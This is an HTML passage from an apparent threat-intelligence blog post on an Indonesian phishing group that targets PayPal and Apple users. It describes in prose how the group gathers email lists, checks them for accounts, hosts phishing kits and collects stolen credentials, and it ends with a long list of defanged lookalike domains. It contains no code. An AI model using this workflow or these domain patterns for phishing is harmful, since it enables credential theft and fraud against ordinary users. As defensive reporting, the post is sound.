<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">We can see this Indonesian group is active with focused efforts in cheating people out of their money, adding insult to injury with boasting their success while sharing screenshots of incoming credentials:</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsrtlmSCcH2Ed8vr8ZSh5SRpNXgtR5207AHhlBb7EQM1T_MCamN3AfrUznzvOzO4deDcQVFOtP1KCCP1nQYpbagO_iC7SHFB3fCW5vHRp2CsjnLsvrJjNN9V7aiRWYRaXHfAqWSOTVvN2M/s1600/e57ef509-f094-4c20-b7ff-e40b82a3fbe5.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsrtlmSCcH2Ed8vr8ZSh5SRpNXgtR5207AHhlBb7EQM1T_MCamN3AfrUznzvOzO4deDcQVFOtP1KCCP1nQYpbagO_iC7SHFB3fCW5vHRp2CsjnLsvrJjNN9V7aiRWYRaXHfAqWSOTVvN2M/s640/e57ef509-f094-4c20-b7ff-e40b82a3fbe5.jpg" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An attacker sharing his harvested credentials.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">Tactics,Techniques, and Procedures</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">This group and those like it operate by initially gathering email lists, ones that can be curated manually, or downloaded from the various cyber crime forums online. Once they have an adequate enough list they will move to their next step - checking the emails for corresponding accounts. They will input the emails they have into account checkers made by the likes of Malhadi Jr from SlackerC0de and see what emails have PayPal accounts, what emails have Apple accounts by utilizing various API calls to these services and see their response. Both these companies seem to be their favorite targets. </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">Once they have amassed a large enough list to move on and start attacking them, these attackers will create a phishing infrastructure for the most crucial steps of their campaign. They will create an online website, mostly hosted by Amazon,Google, or Aruba (the same company they used as a fake receipt for one of their emails) from looking at how this specific group operates. They will host their phishing kit and start mass emailing their list using a bought emailer software from their closed forum marketplace or shared by somebody from the chat group.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">To receive the incoming credentials they manage to steal, they will set up an inbox based on free email services like Yandex. Not much skill is needed to run such a scheme - they will need to only configure the source code for their email, upload to a server, and use an email template. By going over their correspondence we saw how users with no skill whatsoever were asking for resources,more experienced users sharing them, and the backbone to these groups - the tool creators or sellers which supply the 955 members of the group with the easy means of creating their own campaign. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">We witnessed how they share their various setbacks after they launch their campaign, such as Amazon blocking their accounts, screwing up the %email field, failing to configure a server, and more. Meaning even an attacker at the lowest level of skill will be spoon fed the answer to his mistake and how to correct it for the campaign to work. Causing dire consequences to the victims which fall due to this criminal crowdsourcing. </span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="619" src="https://lh3.googleusercontent.com/gaQBm15PUTeWHlRKa2U3Knh1Sx70YjuadGGT0j2erSjFvWZ4LQaaCoXKXmLiRLYedewakxOulzjcXA2VHZFxw_FWFODlb6ZQQu6X-WDpl3srdQFuALZy2dmQdGpGhX3HiCw7ZI8K" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="465" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An attacker sharing a screen capture of his Phishing email.</span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="425" src="https://lh5.googleusercontent.com/4p7-K4qMpnBoz1SkQHZNJJg3FM2AP5MjKeOJLhX3dd9TJ754vmrwjWJ96XJBtUQxCYCQKj5Rm2zchDxEnku4CDH3WZ5k7W5SZDpQxjZi4vmF-xQhB2JLK1CWqsbmRF-i22q88N2n" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An attacker sharing a screenshot in hopes of troubleshooting an error.</span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="351" src="https://lh6.googleusercontent.com/R2dh9xE0KKHXzH31U6KTltnai0j7TqINt8iIWWppb7N6AvlS8cMxFr-IKZXRI7fBNTwT0pZuLvla-XV-313qV9fh1uyU3cw_bDue7vV_pVbURIpV8IsSft7QyOmviARMorodRDDK" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An attacker sharing a screenshot of his blocked Amazon account.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;"><span style="font-weight: 700; text-decoration-line: underline; white-space: pre-wrap;">Historical Observations</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">We then tried to look for historical correlation and past activity this group may have been connected to, so we started looking through <a href="https://www.recordedfuture.com/" target="_blank">RecordedFuture</a>’s threat intelligence platform for further relationships and activity. </span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When we initially looked at the main domain - we were looking for what malware <a href="https://www.recordedfuture.com/" target="_blank">RecordedFuture</a> may have seen connected to SlackerC0de<span style="white-space: normal;">[.]</span>us, if any at all. In this case we were able to see that some ransomware activity and various intertwined domains were connected to SlackerC0de<span style="white-space: normal;">[.]</span>us.</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="293" src="https://lh4.googleusercontent.com/9kvZelh-iKCuQh0fMPLPP8lUSm3RIegtD-KERXReCBX9PLtJyBDfDb022oEjt9_3yfzjskx9oyCsygGz1GJM3tyAKWL799nTIJAU0zsEZfTTa9eg37XCeu0erM7AEM5kJJyPna67" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: RecordedFuture</span></td></tr>
</tbody></table>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">So we continued to look for connected phishing campaigns, and saw that prior to the July 2018 PayPal and Apple campaign that started our investigation, the group ran earlier campaigns in January - mainly targeting Apple and Facebook users. </span><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="325" src="https://lh6.googleusercontent.com/jjro4XAM4kePn7oR1u2i-gDQBwiecRSdD0T5yV-hhywTyEzgUnNuHlj2L23d7jN750cejsAn3QR1T3BTcgDQGcmH6USzc8phxtcb6OsHuE0CjCjjJfyjuRTVIz5_FAl3cH89X5tX" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: RecordedFuture</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Meaning this group is probably constantly busy all year round targeting all the varied popular services in efforts of scamming people out of their money and credentials.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">IOCs</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b id="docs-internal-guid-3c560057-b417-2c4d-1e55-095a46fa8d92" style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">t<span style="white-space: normal;">[.]</span>co-d3gbfd<span style="white-space: normal;">[.]</span>city</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-appredno<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">source-notice<span style="white-space: normal;">[.]</span>ldweblogin.appleid.ldapple.idwebtrue-loginid<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.pyapal<span style="white-space: normal;">[.]</span>com-websecurity<span style="white-space: normal;">[.]</span>app</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">r2.direckkuy1<span style="white-space: normal;">[.]</span>net</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">r1.direckkuy1<span style="white-space: normal;">[.]</span>co</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-serviceart<span style="white-space: normal;">[.]</span>tech</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-serviceart<span style="white-space: normal;">[.]</span>co</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-appredasu<span style="white-space: normal;">[.]</span>center</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypa<span style="white-space: normal;">[.]</span>com-accountverify<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-unauthorized-activity<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.pyapal<span style="white-space: normal;">[.]</span>com-unauthorized-activity<span style="white-space: normal;">[.]</span>report</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-resolution-centers<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-accsuired<span style="white-space: normal;">[.]</span>center</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">a.redirkues<span style="white-space: normal;">[.]</span>com</span></span><br />
<span style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">www.paypa.com-verifyinc<span style="white-space: normal;">[.]</span>net</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal<span style="white-space: normal;">[.]</span>com-webbapps<span style="white-space: normal;">[.]</span>center</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypa.com-accountverify<span style="white-space: normal;">[.]</span>net</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-webappseeds<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-webapps-security<span style="white-space: normal;">[.]</span>tools</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">mail.directseeds<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.co.uk-service<span style="white-space: normal;">[.]</span>solutions</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.co.uk-service<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">direku.2.co-d3gbfd<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">direku.1.co-d3gbfd<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.co.uk-service<span style="white-space: normal;">[.]</span>center</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-verifyseeds<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-accountverify<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypa.com-verifyseeds<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-verifyaccount<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-signinaccountsafe<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypa.com.lakukerascok<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-webappsloginaccount<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">www.paypal.com-webappsloginaccount<span style="white-space: normal;">[.]</span>systems</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">t.co-d3gbfd<span style="white-space: normal;">[.]</span>cc</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">142-4-14-169.unifiedlayer<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">jancokkoen<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">shirtmy<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Lakukerascok<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">com-signinaccountsafe<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">nugra-saputra<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Paypal-customer-confirm<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-webapps<span style="white-space: normal;">[.]</span>site</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-webappsinfo<span style="white-space: normal;">[.]</span>reviews</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypa.com.lakukerascok<span style="white-space: normal;">[.]</span>com</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com.accountinfoverifysupport<span style="white-space: normal;">[.]</span>info</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-accountverify<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.accountinfoverify<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypa.com-verifyseeds<span style="white-space: normal;">[.]</span>support</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-verifyaccount<span style="white-space: normal;">[.]</span>center/ </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-accountservice<span style="white-space: normal;">[.]</span>info</span></span><br />
<span style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">pavpal[.]com-appverifyaccount[.]me</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
